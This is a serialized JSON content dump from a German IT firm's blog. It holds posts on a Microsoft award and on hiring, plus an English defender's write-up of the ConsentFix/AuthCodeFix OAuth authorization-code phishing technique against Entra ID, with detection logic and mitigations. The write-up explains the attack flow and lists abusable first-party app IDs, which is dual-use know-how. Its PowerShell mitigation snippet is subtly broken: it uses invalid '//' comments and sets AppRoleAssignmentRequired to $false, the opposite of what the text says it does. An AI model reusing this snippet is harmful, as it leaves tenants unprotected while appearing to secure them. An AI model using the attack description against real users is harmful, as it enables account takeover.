lesen!",{"title":402,"searchDepth":403,"depth":403,"links":27938},[27939,27940,27941,27942,27943,27944,27945],{"id":27824,"depth":403,"text":27825},{"id":27836,"depth":403,"text":27837},{"id":27842,"depth":403,"text":27843},{"id":27859,"depth":403,"text":27860},{"id":27883,"depth":403,"text":27884},{"id":27903,"depth":403,"text":27904},{"id":27919,"depth":403,"text":27920},{"lang":2183,"seoTitle":27818,"titleClass":7896,"date":27947,"categories":27948,"blogtitlepic":27949,"socialimg":27950,"customExcerpt":27951,"keywords":27952,"contactInContent":27953,"hreflang":27970,"footer":27975,"scripts":27976,"published":415},"2025-10-07",[1117],"head-preventing-cyber-attacks","/blog/heads/head-preventing-cyber-attacks.png","Samstagmorgen, irgendwo in Deutschland. Während das Wochenende für viele gerade begonnen hat, bemerkt unser Team die ersten Warnsignale auf den Systemen eines Kundenunternehmens: Ungewöhnliche Aktivitäten, die sofort alle Alarmglocken läuten lassen. Eine schnelle Analyse bestätigt den Verdacht – Ransomware. Innerhalb kürzester Zeit sind zentrale Systeme kompromittiert. Was folgt, ist ein Wettlauf gegen die Zeit: Systeme absichern, kritische Bereiche isolieren und anschließend die Wiederherstellung starten.","Security, CSOC, Microsoft Security, Cyber Attacks, Prevention",{"quote":415,"infos":27954},{"bgColor":12128,"headline":10059,"subline":27780,"level":2548,"textStyling":9489,"flush":9490,"person":27955,"form":27956},{"image":9327,"cloudinary":415,"alt":27782,"name":164,"quotee":164,"quoteeTitle":27783,"quote":27784},{"ctaText":9508,"cta":27957,"method":407,"action":9511,"fields":27958},{"skin":9510},[27959,27960,27961,27962,27963,27964,27965,27966,27967,27968,27969],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":27789},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":27791},{"label":10941,"type":9523,"id":9523,"required":415,"requiredMsg":27793},{"label":13476,"type":13030,"id":13031,"required":406,"requiredMsg":13032},{"label":27796,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":13036,"value":1117},{"type":9531,"id":13038,"value":27799},{"type":9531,"id":9532,"value":27801},{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"type":9531,"id":27805},[27971,27973],{"lang":2118,"href":27972},"/en/posts/2025-10-07-prevent-cyber-attacks.md",{"lang":9114,"href":27974},"/es/posts/2025-10-07-prevent-cyber-attacks.md",{"noMargin":415},{"slick":415},"/posts/2025-10-07-prevent-cyber-attacks",{"title":27818,"description":402},"posts/2025-10-07-prevent-cyber-attacks",[1117,4707],"ki4JLfo-Vg2KVqMAncf5JwDoCwb3pPJROZxoU1jeLRI",{"id":27983,"title":27984,"author":27985,"body":27986,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":28064,"moment":28066,"navigation":415,"path":28106,"seo":28107,"stem":28108,"tags":28109,"webcast":406,"__hash__":28110},"content_de/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first am Flughafen: Microsoft Partner of the Year Awards 2025",[191],{"type":350,"value":27987,"toc":28058},[27988,27992,27994,27997,28000,28004,28006,28009,28012,28026,28029,28033,28037,28039,28042,28046,28048,28051],[2548,27989,27991],{"id":27990},"vom-rollfeld-in-die-cloud","Vom Rollfeld in die Cloud",[353,27993,9352],{},[353,27995,27996],{},"Fraport betreibt 29 Flughäfen weltweit, darunter den Flughafen Frankfurt – einen der größten Verkehrsknotenpunkte Europas. Mehr als 80.000 Mitarbeitende halten dort täglich den Betrieb am Laufen: von der Gepäckabfertigung bis zur IT-Sicherheit. Damit diese Abläufe funktionieren, braucht es eine verlässliche, skalierbare und sichere digitale Infrastruktur.",[353,27998,27999],{},"Genau hier setzte das gemeinsame Projekt von Fraport und glueckkanja an: Die bestehende VDI-Umgebung sollte durch eine moderne, cloudbasierte Arbeitsplatzarchitektur ersetzt werden. Das Ziel: mehr Flexibilität, weniger Komplexität, und eine Plattform, die auf die Anforderungen einer global vernetzten Organisation zugeschnitten ist.",[2548,28001,28003],{"id":28002},"cloud-managed-workplace","Cloud Managed Workplace",[353,28005,9352],{},[353,28007,28008],{},"Im Zentrum steht die Kombination aus Windows 365 Cloud PCs und der Microsoft Intune Suite. Mehr als 16.500 Endpoints werden heute zentral bereitgestellt, verwaltet und abgesichert.",[353,28010,28011],{},"Das Ergebnis:",[367,28013,28014,28017,28020,28023],{},[370,28015,28016],{},"Gerätebereitstellung in Minuten statt Stunden",[370,28018,28019],{},"Automatisierte Prozesse für mehr Effizienz",[370,28021,28022],{},"Transparente Verwaltung und Monitoring",[370,28024,28025],{},"Zero-Trust-Sicherheitsmodell über alle Geräte hinweg",[353,28027,28028],{},"So entsteht ein Arbeitsplatzkonzept, das Fraports Mitarbeitenden sichere und flexible Arbeit über alle Standorte, Endgeräte und Rollen hinweg ermöglicht.",[9300,28030],{":quotes":28031,":no-fullscreen":7391,"spacing":28032},"quoteMicrosoft","mb-10",[2548,28034,28036],{"id":28035},"anerkennung-für-innovation-und-zusammenarbeit","Anerkennung für Innovation und Zusammenarbeit",[353,28038,9352],{},[353,28040,28041],{},"Mit den Microsoft Partner of the Year Awards zeichnet Microsoft jedes Jahr Partnerunternehmen aus, die herausragende Cloud-Lösungen, Services und Innovationen entwickeln und umsetzen. In einem globalen Wettbewerb aus mehr als 4.600 Einreichungen wurde glueckkanja für die erfolgreiche Umsetzung des Fraport-Projekts hervorgehoben, ein starkes Zeichen für die Relevanz cloudbasierter Arbeitsplatzlösungen in kritischen Infrastrukturen.",[2548,28043,28045],{"id":28044},"ein-blueprint-für-moderne-arbeitsplatzarchitektur","Ein Blueprint für moderne Arbeitsplatzarchitektur",[353,28047,9352],{},[353,28049,28050],{},"Das Projekt zeigt, wie sich komplexe Infrastrukturen mit der Cloud neu denken lassen, ohne dabei Kompromisse bei Sicherheit oder Benutzerfreundlichkeit einzugehen. Für Fraport war es der Schritt zu einem standardisierten, cloudbasierten Arbeitsplatzmodell. Für glueckkanja ist es ein Beispiel dafür, wie sich moderne IT-Strategien nachhaltig skalieren lassen.",[353,28052,28053,28054,456],{},"Die vollständige Liste aller ausgezeichneten Projekte findet sich ",[374,28055,1491],{"href":28056,"rel":28057},"https://aka.ms/2025POTYAWinnersFinalists",[378],{"title":402,"searchDepth":403,"depth":403,"links":28059},[28060,28061,28062,28063],{"id":27990,"depth":403,"text":27991},{"id":28002,"depth":403,"text":28003},{"id":28035,"depth":403,"text":28036},{"id":28044,"depth":403,"text":28045},{"seoTitle":28065,"titleClass":7896,"date":28066,"categories":28067,"blogtitlepic":28068,"socialimg":28069,"customExcerpt":28070,"keywords":28071,"contactInContent":28072,"hreflang":28094,"scripts":28099,"quoteMicrosoft":28100},"Cloud-first am Flughafen: Ausgezeichnet bei den Microsoft Partner of the Year Awards 2025","2025-11-12",[410],"head-partner-of-the-year-2025","/heads/head-partner-of-the-year-2025.jpg","Mehr als 4.600 Nominierungen aus über 100 Ländern und mittendrin ein Projekt, das zeigt, wie moderne IT aussehen kann: Gemeinsam mit Fraport wurde glueckkanja bei den Microsoft Partner of the Year Awards 2025 in der Kategorie Cloud Endpoints ausgezeichnet.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Fallstudie, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Sicherheit, Modern Workplace, Cloud-first Strategie, Digitale Arbeitsplatztransformation, Endpoint Management, Automatisierte Gerätebereitstellung, Sichere Cloud-Infrastruktur, Skalierbare IT-Architektur, Cloud Governance und Compliance, Enterprise Mobility und Security, IT-Infrastruktur im Flughafen, Digitale Transformation in der Luftfahrt, IT für kritische Infrastrukturen, Globale IT-Operationen, Remote Work Enablement, IT-Modernisierung im Transportwesen, Cloud-basierter Arbeitsplatz für kritische Infrastrukturen, Microsoft Windows 365 und Intune in Unternehmen, Sichere und skalierbare Endpoint-Verwaltung, Transformation von Flughafen-IT mit Azure",{"quote":415,"infos":28073},{"bgColor":12128,"color":10128,"boxBgColor":10127,"boxColor":10128,"headline":10129,"subline":28074,"level":2548,"textStyling":9489,"flush":9490,"person":28075,"form":28080},"Ihr möchtet mehr über das Projekt und unsere Auszeichnung erfahren? Wir zeigen euch gerne, wie der Weg zur standardisierten Cloud-Architektur bei Fraport umgesetzt wurde.",{"image":10132,"cloudinary":415,"alt":149,"name":149,"quotee":149,"quoteeTitle":10133,"quote":28076,"detailsHeader":10135,"details":28077},"Das Projekt mit Fraport zeigt, wie sich durch Standardisierung und Automatisierung ein sicheres, skalierbares Arbeitsplatzmodell umsetzen lässt. Genau das braucht es, um IT-Umgebungen langfristig stabil zu betreiben und weiterzuentwickeln.",[28078,28079],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":28081,"method":407,"action":9511,"fields":28082},{"skin":9510},[28083,28084,28085,28086,28087,28088,28089,28090,28091,28092,28093],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":27789},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":27791},{"label":10941,"type":9523,"id":9523,"required":415,"requiredMsg":27793},{"label":13476,"type":13030,"id":13031,"required":406,"requiredMsg":13032},{"label":27796,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":13036,"value":1117},{"type":9531,"id":13038,"value":27799},{"type":9531,"id":9532,"value":27801},{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"type":9531,"id":27805},[28095,28097],{"lang":2118,"href":28096},"/en/posts/2025-11-12-partner-of-the-year-awards",{"lang":9114,"href":28098},"/es/posts/2025-11-12-partner-of-the-year-awards",{"slick":415,"form":415},{"items":28101},[28102],{"text":28103,"name":28104,"company":28105,"alt":28104},"Durch den Wechsel zu Windows 365 Cloud PCs und zur Intune Suite haben wir ein neues Maß an Agilität und Sicherheit erreicht. Die Zusammenarbeit mit glueckkanja hat die Basis für zukünftige Innovationen gelegt.","Niklas Rast","Senior Solution Architect bei Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":27984,"description":402},"posts/2025-11-12-partner-of-the-year-awards",[3933,3934],"ugHL2_yBqKQy8RmtxPeaM2ufHa6JHC9gytfnVgaF740",{"id":28112,"title":28113,"author":28114,"body":28115,"cta":3,"description":28119,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":28216,"moment":28218,"navigation":415,"path":28230,"seo":28231,"stem":28232,"tags":28233,"webcast":406,"__hash__":28234},"content_de/posts/2025-12-08-recruiting-process.md","Ein Teil vom Glück: So läuft unser Bewerbungs­prozess ab",[282],{"type":350,"value":28116,"toc":28208},[28117,28120,28123,28126,28137,28141,28143,28146,28149,28153,28155,28158,28169,28172,28176,28178,28181,28185,28187,28190,28194,28196,28199,28203,28205],[353,28118,28119],{},"Oft werden wir gefragt: Was muss ich mitbringen? Was ist euch wichtig?",[353,28121,28122],{},"Vielleicht so viel: Wir mögen Menschen, die Lust haben, in einer Tech-Welt unterwegs zu sein, die sich jeden Tag ein Stück weiterdreht. Wir sehen uns als ein Team, das gemeinsam an einem Strang zieht.",[353,28124,28125],{},"Und wir suchen Menschen, die Technik genauso begeistert wie uns:",[367,28127,8923,28128,8923,28131,8923,28134],{},[370,28129,28130],{},"die Herausforderungen nicht scheuen, sondern darin aufgehen, wenn sie tief in komplexe Themen eintauchen können.",[370,28132,28133],{},"die den Status Quo hinterfragen und mit Leidenschaft neue, innovative Lösungen entwickeln für glueckkanja und unsere Kunden.",[370,28135,28136],{},"die gerne Teil einer Community sind, ihr Wissen teilen und voneinander lernen möchten.",[2548,28138,28140],{"id":28139},"schritt-1-deine-bewerbung","Schritt 1: Deine Bewerbung",[353,28142,9352],{},[353,28144,28145],{},"Du hast deine Unterlagen abgeschickt, der erste Schritt ist getan! Bei uns prüft keine KI deine Bewerbung, sondern unser Recruiting-Team persönlich. Du fragst dich, wer sich hinter dem Recruiting Team verbirgt? Here we are!",[353,28147,28148],{},"Wir, das sind Kerstin, Anna, Steffi und Jan, nehmen uns Zeit, deinen CV genau anzuschauen und prüfen, ob deine Erfahrung und Skills zu unseren Anforderungen passen. Unser Ziel: Du bekommst innerhalb von 1-2 Wochen, meistens sogar schon nach ein paar Tagen, eine Rückmeldung von uns. Wir wissen, wie nervenaufreibend das Warten sein kann.",[2548,28150,28152],{"id":28151},"schritt-2-kennenlernen-mit-people-culture","Schritt 2: Kennenlernen mit People & Culture",[353,28154,9352],{},[353,28156,28157],{},"Wenn dein Profil passt, starten wir in die erste Runde. Keine Sorge, du musst nicht nervös sein! Du hast mit deinem CV bereits einen super ersten Eindruck hinterlassen. Im Gespräch möchten wir dich als Person kennenlernen:",[367,28159,8923,28160,8923,28163,8923,28166],{},[370,28161,28162],{},"Wer bist du?",[370,28164,28165],{},"Was macht dich aus?",[370,28167,28168],{},"Was suchst du für deine Zukunft?",[353,28170,28171],{},"Hier geht es um ein offenes, ehrliches Kennenlernen auf Augenhöhe.\n ",[2548,28173,28175],{"id":28174},"schritt-3-fachlicher-austausch-mit-deinem-zukünftigen-lead","Schritt 3: Fachlicher Austausch mit deinem zukünftigen Lead",[353,28177,9352],{},[353,28179,28180],{},"Im zweiten Gespräch lernst du deinen Lead kennen. Jetzt wird es etwas technischer: Wir sprechen über deine fachlichen Skills und du kannst alle Fragen zu Aufgaben, Team und Projekten stellen. Ein bisschen Aufregung gehört dazu – aber hey, du bist schon einen Schritt weiter!",[2548,28182,28184],{"id":28183},"schritt-4-team-meet-culture-check","Schritt 4: Team-Meet & Culture Check",[353,28186,9352],{},[353,28188,28189],{},"Bei glueckkanja ist Kultur mehr als ein Wort. Sie ist unser Alltag. Deshalb lernst du im letzten Step dein mögliches Team kennen. So stellen wir sicher, dass es für beide Seiten passt, fachlich wie menschlich.",[2548,28191,28193],{"id":28192},"finale-dein-angebot","Finale: Dein Angebot",[353,28195,9352],{},[353,28197,28198],{},"Du hast uns überzeugt? Dann folgt das persönliche Angebotsgespräch. Hier klären wir alle Details zum Angebot und beantworten deine abschließenden Fragen.",[2548,28200,28202],{"id":28201},"warum-so-viele-schritte","Warum so viele Schritte?",[353,28204,9352],{},[353,28206,28207],{},"Ganz einfach: Wir möchten sicherstellen, dass du dich bei uns wohlfühlst und wir gemeinsam erfolgreich sind. Unsere Gespräche finden immer auf Augenhöhe statt – und das „Du“ ist bei uns selbstverständlich.",{"title":402,"searchDepth":403,"depth":403,"links":28209},[28210,28211,28212,28213,28214,28215],{"id":28139,"depth":403,"text":28140},{"id":28151,"depth":403,"text":28152},{"id":28174,"depth":403,"text":28175},{"id":28183,"depth":403,"text":28184},{"id":28192,"depth":403,"text":28193},{"id":28201,"depth":403,"text":28202},{"lang":2183,"seoTitle":28217,"titleClass":7896,"date":28218,"categories":28219,"blogtitlepic":28220,"socialimg":28221,"customExcerpt":28222,"keywords":28223,"hreflang":28224,"scripts":28229},"Ein Teil vom Glück: So läuft der Bewerbungsprozess bei glueckkanja ab","2025-12-08",[410],"head-recruiting-process","/heads/head-recruiting-process.png","Du hast eine spannende Stelle bei uns entdeckt und möchtest dich bewerben? Super, wir freuen uns immer über neue Talente! Aber wie geht es nach dem Klick auf „Bewerbung absenden“ weiter? Hier geben wir dir einen Blick hinter die Kulissen.","Bewerbungsprozess glueckkanja, Recruiting IT Unternehmen, IT Jobs Deutschland, Karriere glueckkanja, Employer Branding IT, Bewerbung IT Branche, Tech Jobs, Recruiting Prozess IT, Arbeiten bei glueckkanja, IT Karriere, Talent Acquisition IT, People and Culture IT, Bewerbungsgespräch Tipps IT",[28225,28227],{"lang":2118,"href":28226},"/en/posts/2025-12-08-recruiting-process.md",{"lang":9114,"href":28228},"/es/posts/2025-12-08-recruiting-process.md",{"slick":415,"form":415},"/posts/2025-12-08-recruiting-process",{"title":28113,"description":28119},"posts/2025-12-08-recruiting-process",[2540,4097,474],"MYU2dWOGbcnNm1z_SeJp7Ezgj4blki_92PJsGrB5vD4",{"id":28236,"title":28237,"author":28238,"body":28239,"cta":3,"description":28243,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":29021,"moment":29023,"navigation":415,"path":29049,"seo":29050,"stem":29051,"tags":29052,"webcast":406,"__hash__":29055},"content_de/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka ConsentFix",[224,102,260],{"type":350,"value":28240,"toc":29001},[28241,28244,28247,28250,28256,28259,28262,28271,28276,28284,28304,28307,28313,28316,28319,28325,28330,28334,28344,28350,28353,28356,28360,28363,28369,28376,28379,28399,28409,28413,28416,28419,28422,28425,28429,28432,28435,28452,28461,28465,28469,28489,28493,28497,28508,28511,28518,28522,28536,28540,28551,28555,28558,28566,28569,28577,28580,28588,28592,28595,28616,28619,28683,28686,28689,28692,28695,28698,28704,28707,28748,28752,28767,28771,28775,28789,28792,28795,28800,28803,28814,28818,28825,28829,28835,28840,28854,28860,28866,28872,28883,28886,28892,28895,28920,28928,28932,28952,28958,28961,28967,28971],[353,28242,28243],{},"As it is tradition right before the end of the year, a new vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[353,28245,28246],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. The method used in the wild relied on a manual copy and paste action by the user to work. Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[353,28248,28249],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[353,28251,28252],{},[356,28253],{"alt":28254,"src":28255},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[353,28257,28258],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[353,28260,28261],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. This port is used as a so called reply URI.",[353,28263,28264,28265,28270],{},"You can easily reproduce this yourself, for example by using ",[374,28266,28269],{"href":28267,"rel":28268},"https://github.com/f-bader/TokenTacticsV2",[378],"TokenTacticsV2",", or by crafting the URI manually.",[353,28272,28273],{},[356,28274],{"alt":28269,"src":28275},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[353,28277,28278,28279,28283],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[374,28280,28281],{"href":28281,"rel":28282},"http://localhost:3001",[378],". In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[367,28285,28286,28296],{},[370,28287,28288,28290,28292,28293,28295],{},[433,28289,3724],{},[2970,28291],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[2970,28294],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[370,28297,28298,28301,28303],{},[433,28299,28300],{},"state",[2970,28302],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[353,28305,28306],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[353,28308,28309],{},[356,28310],{"alt":28311,"src":28312},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[353,28314,28315],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[353,28317,28318],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[353,28320,28321],{},[356,28322],{"alt":28323,"src":28324},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[2179,28326,28327],{},[353,28328,28329],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[2548,28331,28333],{"id":28332},"detection-artifacts","Detection artifacts",[353,28335,28336,28337,13854,28340,28343],{},"When you reproduce the attack and check the ",[3724,28338,28339],{},"SigninLogs",[3724,28341,28342],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[353,28345,28346],{},[356,28347],{"alt":28348,"src":28349},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[353,28351,28352],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[353,28354,28355],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[629,28357,28359],{"id":28358},"missing-link","Missing link",[353,28361,28362],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[353,28364,28365],{},[356,28366],{"alt":28367,"src":28368},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[353,28370,28371,28372,28375],{},"However, the ",[3724,28373,28374],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[353,28377,28378],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection factor:",[367,28380,28381,28384,28387,28390,28393,28396],{},[370,28382,28383],{},"Both events share the same SessionId",[370,28385,28386],{},"Both events share the same ApplicationId",[370,28388,28389],{},"Both events share the same UserId",[370,28391,28392],{},"The second event must be after the first event",[370,28394,28395],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[370,28397,28398],{},"You should only consider the very next second event, not subsequent ones",[2179,28400,28401],{},[353,28402,28403,28406,28408],{},[433,28404,28405],{},"Fun fact",[2970,28407],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. The targeted application ID cannot be changed.",[2548,28410,28412],{"id":28411},"reduce-the-noise","Reduce the noise",[353,28414,28415],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[353,28417,28418],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[353,28420,28421],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[353,28423,28424],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[2548,28426,28428],{"id":28427},"affected-first-party-applications","Affected first-party applications",[353,28430,28431],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. The attacker could also abuse reply test and dev URLs that are not publicly resolvable.",[353,28433,28434],{},"Here is a list of the most notable applications that also have high pre-consentet permissions on resources.",[367,28436,28437,28440,28443,28446,28449],{},[370,28438,28439],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[370,28441,28442],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[370,28444,28445],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[370,28447,28448],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[370,28450,28451],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[353,28453,28454,28455,28460],{},"A full list of these apps are now included in ",[374,28456,28459],{"href":28457,"rel":28458},"https://entrascopes.com/?authcodeFix=true",[378],"EntraScopes.com"," by our colleague Fabian Bader.",[2548,28462,28464],{"id":28463},"mitigations-and-protections","Mitigations and Protections",[629,28466,28468],{"id":28467},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[2559,28470,28473,28476,28477,28479,28482,28483,28485,28488],{"className":28471},[28472],"option-block",[433,28474,28475],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate users)",[2970,28478],{},[433,28480,28481],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[2970,28484],{},[433,28486,28487],{},"Scope:"," limited\n",[629,28490,28492],{"id":28491},"option-1-require-user-assignment","Option 1: Require User Assignment",[5786,28494,28496],{"id":28495},"pre-requisites","Pre-requisites:",[367,28498,28499,28502,28505],{},[370,28500,28501],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[370,28503,28504],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[370,28506,28507],{},"Establish a process to assign users upon request via Access Packages, PIM-for-Groups (for just-in-time access), or a combination of both.",[10832,28509,28510],{},"\n.code-block {\n  background-color: #f6f8fa;\n  padding: 0 16px 16px 16px;\n  border-radius: 6px;\n  font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n  font-size: 14px;\n  line-height: 1.5;\n  overflow-x: auto;\n  white-space: pre;\n  border: 1px solid #d0d7de;\n}\n",[3102,28512,28515],{"className":28513},[28514],"code-block",[3724,28516,28517],{},"\n// Example for Microsoft Graph PowerShell\nConnect-MgGraph -Identity\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" // Microsoft Azure CLI\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$false\n",[5786,28519,28521],{"id":28520},"benefit","Benefit:",[367,28523,28524,28527,28530,28533],{},[370,28525,28526],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[370,28528,28529],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[370,28531,28532],{},"Applied before evaluating Conditional Access policies.",[370,28534,28535],{},"Limits the attack surface for other scenarios as well.",[5786,28537,28539],{"id":28538},"disadvantage","Disadvantage:",[367,28541,28542,28545,28548],{},[370,28543,28544],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[370,28546,28547],{},"All legitimate CLI tool users must be identified",[370,28549,28550],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[629,28552,28554],{"id":28553},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access Policies",[5786,28556,28496],{"id":28557},"pre-requisites-1",[367,28559,28560,28563],{},[370,28561,28562],{},"Create a Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[370,28564,28565],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[5786,28567,28521],{"id":28568},"benefit-1",[367,28570,28571,28574],{},[370,28572,28573],{},"Prevents token issuance for non-legitimate or non-privileged users.",[370,28575,28576],{},"Allows granular scoping based on additional conditions such as device or network.",[5786,28578,28539],{"id":28579},"disadvantage-1",[367,28581,28582,28585],{},[370,28583,28584],{},"All legitimate CLI tool users must be identified and excluded.",[370,28586,28587],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[629,28589,28591],{"id":28590},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[10832,28593,28594],{},"\n.option-block {\n  background-color: #f6f8fa;\n  padding: 16px;\n  margin-bottom:2rem;\n  border-radius: 6px;\n  overflow-x: auto;\n  border: 1px solid #d0d7de;\n}\n",[2559,28596,28598,28601,28602,28604,28606,28607,28609,28606,28611,28613,28615],{"className":28597},[28472],[433,28599,28600],{},"Option:"," Require Token Protection",[2970,28603],{},[433,28605,28475],{}," High",[2970,28608],{},[433,28610,28481],{},[2970,28612],{},[433,28614,28487],{}," Very limited\n",[5786,28617,28496],{"id":28618},"pre-requisites-2",[367,28620,28621,28624,28627,28646],{},[370,28622,28623],{},"Microsoft Entra ID P1 licenses",[370,28625,28626],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[370,28628,28629,28630,2454,28635,13854,28640,28645],{},"Enable Web Account Manager (WAM) in ",[374,28631,28634],{"href":28632,"rel":28633},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[378],"Azure CLI",[374,28636,28639],{"href":28637,"rel":28638},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[378],"Azure PowerShell",[374,28641,28644],{"href":28642,"rel":28643},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[378],"Microsoft Graph PowerShell"," (default in latest versions)",[370,28647,28648,28649],{},"Configure Conditional Access targeting:\n",[367,28650,28651,28665,28672],{},[370,28652,28653,28654],{},"Cloud App targeting to the following apps:\n",[367,28655,28656,28659,28662],{},[370,28657,28658],{},"Office 365 Exchange Online",[370,28660,28661],{},"Office 365 SharePoint Online",[370,28663,28664],{},"Microsoft Teams Services",[370,28666,28667,28668,28671],{},"Client apps under ",[748,28669,28670],{},"Mobile apps and desktop clients"," to require Token Protection.",[370,28673,28674,28675,28678,28679,28682],{},"Select ",[748,28676,28677],{},"Windows"," as ",[748,28680,28681],{},"device platform"," for targeting the policy",[5786,28684,28521],{"id":28685},"benefit-2",[353,28687,28688],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on 